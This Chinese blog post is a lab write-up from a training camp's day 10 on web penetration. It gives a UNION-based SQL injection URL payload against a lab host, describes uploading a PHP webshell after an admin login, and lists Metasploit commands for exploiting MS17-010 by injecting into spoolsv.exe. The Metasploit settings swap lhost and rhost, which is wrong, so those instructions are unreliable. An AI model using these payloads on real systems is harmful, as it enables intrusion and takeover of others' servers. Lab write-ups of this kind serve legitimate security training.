蓝盾实训营day10——Web渗透实战

扫描

蓝盾实训营day10——Web渗透实战_第1张图片

SQL注入

开放了80端口,直接用浏览器访问靶机的网站,发现有SQL注入点:
蓝盾实训营day10——Web渗透实战_第2张图片

payload

http://192.168.188.150/index.php?s=/news/6) and 1=2 union select 1,database(),3,4,5,6,version()--

最终得到数据库账号密码:
蓝盾实训营day10——Web渗透实战_第3张图片

这里用的是base64加密,可以直接解密成明文。

进入后台

后台扫描:
蓝盾实训营day10——Web渗透实战_第4张图片

用admin登陆后,找到文件上传入口,上传php一句话木马:
蓝盾实训营day10——Web渗透实战_第5张图片

MS17-010漏洞利用

用kali-nessus扫描漏洞:
蓝盾实训营day10——Web渗透实战_第6张图片

开启metasploit,搜索漏洞MS17-010:
蓝盾实训营day10——Web渗透实战_第7张图片

show options,配置好之后运行:
蓝盾实训营day10——Web渗透实战_第8张图片

set lhost 靶机ip
set rhost kali的ip
set PROCESSINJECT 要注入的进程

这个漏洞需要注入靶机的某个进程来运行,我们可以看看win7电脑有哪些进程是必须运行的,设置为该进程,这里注入的是spoolsv.exe

蓝盾实训营day10——Web渗透实战_第9张图片

总结

十天实训终于结束了,感觉还能学得更多,但是毕竟是免费的课程,教得比较有限,大家可以查询Kali Linux的相关课程来深入学习Web渗透。

你可能感兴趣的:(网络安全,蓝盾十天网络攻防实训营记录)